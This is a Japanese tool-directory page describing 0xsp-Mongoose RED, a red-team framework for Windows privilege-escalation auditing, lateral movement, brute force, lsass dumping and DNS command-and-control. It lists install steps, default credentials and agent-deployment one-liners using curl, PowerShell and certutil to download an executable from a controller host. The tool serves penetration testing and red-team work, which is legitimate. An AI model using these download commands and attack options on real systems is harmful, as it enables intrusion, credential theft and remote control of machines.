Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
0xsp-Mongoose — サイバーセキュリティシミュレーションとレッドチーム運用のためのユニークなフレームワーク。新しい脆弱性、誤構成、特権昇格攻撃に対するWindows監査を実施し、ネットワーク内の高度な敵対者の戦術と技術を再現します。 | Kitploit
ツール/GitHubGitHub/zux0x3a/0xsp-mongoose
特権昇格脆弱性スキャナーネットワークマッピングパスワード攻撃エクスプロイト横移動ウェブアプリケーション悪用ポストエクスプロイトコマンド&コントロールレッドチーミングDNS分析Archived
5341174年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
zux0x3a/0xsp-mongoose

0xsp-Mongoose

サイバーセキュリティシミュレーションとレッドチーム運用のためのユニークなフレームワーク。新しい脆弱性、誤構成、特権昇格攻撃に対するWindows監査を実施し、ネットワーク内の高度な敵対者の戦術と技術を再現します。

リポジトリを見るウェブサイト

GPLv3 license

プロジェクトの継続的な開発を支援する (ETH 0xf340c15c5e669a4ababab856e9f2bccd659d6e42)

0xsp Mongoose RED Windows用

現在のリリース 2.2.0

0xsp mongoose red バージョンは、サイバーセキュリティシミュレーション中のニーズを支援するために提供されています。このバージョンを使用すると、対象のWindowsオペレーティングシステムを監査し、システムの脆弱性、設定ミス、特権昇格攻撃を検出し、ネットワーク内の高度な敵対者の戦術と技術を複製できます。

Node.js によるWebアプリケーションAPIのサポートにより、タイムリーなインストールとカスタマイズがはるかに簡単になります。WindowsセンサーエージェントはアプリケーションAPIと通信して結果を転送し、双方向技術としてコマンドを受信します。

エージェントは、windows update api および exploit database definitions モジュールを使用してWindowsエクスプロイトを識別および検出できます。新しいリリースでは、以下の脆弱性も検出します。

  • CVE-2019-0836
  • CVE-2019-0841
  • CVE-2019-1064
  • CVE-2019-1130
  • CVE-2019-1253
  • CVE-2019-1385
  • CVE-2019-1388
  • CVE-2019-1405
  • CVE-2019-1315
  • CVE-2020-0787
  • CVE-2020-0796
  • CVE-2020-0797
  • CVE-2020-1472
  • CVE-2021-1675

機能

  • Windows特権昇格スキャン手法
  • NodeJS で構築されたWebアプリケーション
  • sqlite DB をサポート
  • 横移動技術 ビデオ
  • 双方向通信チャネル ビデオ
  • プラグインのオンラインパッケージ化
  • 拡張エクスプロイト検出スクリプトエンジン
  • Windowsアカウントブルートフォースモジュール(ローカル/ドメイン)
  • run-as-user Windows API関数の武器化 ビデオ
  • ローカルネットワークスキャンと共有列挙
  • lsassメモリダンプ技術(プラグイン)
  • DNS C2C インタラクティブシェルモード

インストール

root@kitploit:~
git clone --single-branch --branch 0xsp-red https://github.com/lawrenceamer/0xsp-mongoose 
cd 0xsp-mongoose/ 
npm install 
node index.js

デフォルトのアクセス資格情報:

  • ユーザー名 : admin
  • パスワード : 0xsp

DNS C2C Pythonスクリプト

root@kitploit:~
touch temp.txt
python3 dns_server.py -d DOMAIN -a PUBLICIP -i INTERFACEIP

エージェントのクイックデプロイ

root@kitploit:~
#例1 
curl.exe -o agent.exe http://nodejsip:4000/release/x64.exe
#例2 
powershell.exe -command (new-object net.webclient).downloadfile('http://nodejsip:4000/release/x64.exe','c:\tmp\agent.exe');
#例3 
certutil.exe -urlcache -split -f "http://nodejsip:4000/release/x64.exe" agent.exe

使い方

root@kitploit:~
-s --Windowsサービスとインストール済みドライバーを取得。
-u --ユーザー、グループ、ロールに関する情報を取得。
-c --接続されたドライバーから拡張子で機密設定ファイルを検索。
-n --ネットワーク情報、ネットワークインターフェース、接続詳細を取得。
-w --書き込み可能なディレクトリの列挙、アクセス権限チェック、変更された権限。
-i --Windowsシステム情報、セッション、常に昇格チェックを列挙。
-l --ファイル内で特定の文字列を検索(例: agent.exe -l c:\ password *.config)。
-o --Node.jsアプリケーションのホストアドレスを指定(srvhostも使用可)。
-p --インストール済みソフトウェア、実行中のプロセス、タスクを列挙。
-e --カーネル検査ツール。ツールデータベースからWindowsカーネル脆弱性を検索。
-x --Node.jsアプリケーションへの接続を認証するパスワード。
-d --ターゲットマシンに直接ファイルをダウンロード。
-t --ターゲットマシンからNode.jsアプリケーションにファイルをアップロード。
-spooler --単一ホストまたはホストリストをスキャンして、CVE-2021-1675の可能性を調査(例: -spooler -srvhost または -spooler -hosts)
-m --すべての既知のスキャンタイプをまとめて実行。

[!] レッドチーム戦術セクション

-r --特定のアカウントでリバースシェルを起動。
-lr --WMIを使用した横移動技術(例: -lr -host 192.168.14.1 -username administrator -password blabla -srvhost nodejsip)
-nds --ネットワーク検出と共有列挙
-dns --インタラクティブなDNS C2Cシェルを確立
-cmd --HTTPシェル経由でコマンドを転送
-interactive --インタラクティブモードを開始(例: プラグインの読み込みなど)
-username --特定の攻撃モジュール用のID認証
-password --特定の攻撃モジュール用のID認証
-host --攻撃対象のリモートホストを指定
-srvhost --Node.jsアプリケーションのrhostを設定
-bf --ローカルユーザー/ドメインユーザーのブルートフォースモジュール
-import --DLLファイルをローカルにインポートして実行
-remote --リモートホストからDLLファイルをインポートして実行

ドキュメンテーション

https://0xsp.com/security%20dev/0xsp-mongoose-red

詳細な研究サイト

https://0xsp.com

セキュリティカンファレンス

  • Standoff365 - ロシア (https://standoff365.com/conferences/357)

ツールチュートリアル

0xspの新しいチュートリアルやトリックが公開されたときに通知を受け取るには、以下のチャンネルに登録してください。 https://www.youtube.com/channel/UCoEr6Qsyd6oMsPmaJPQ_FOg

ツールをダウンロード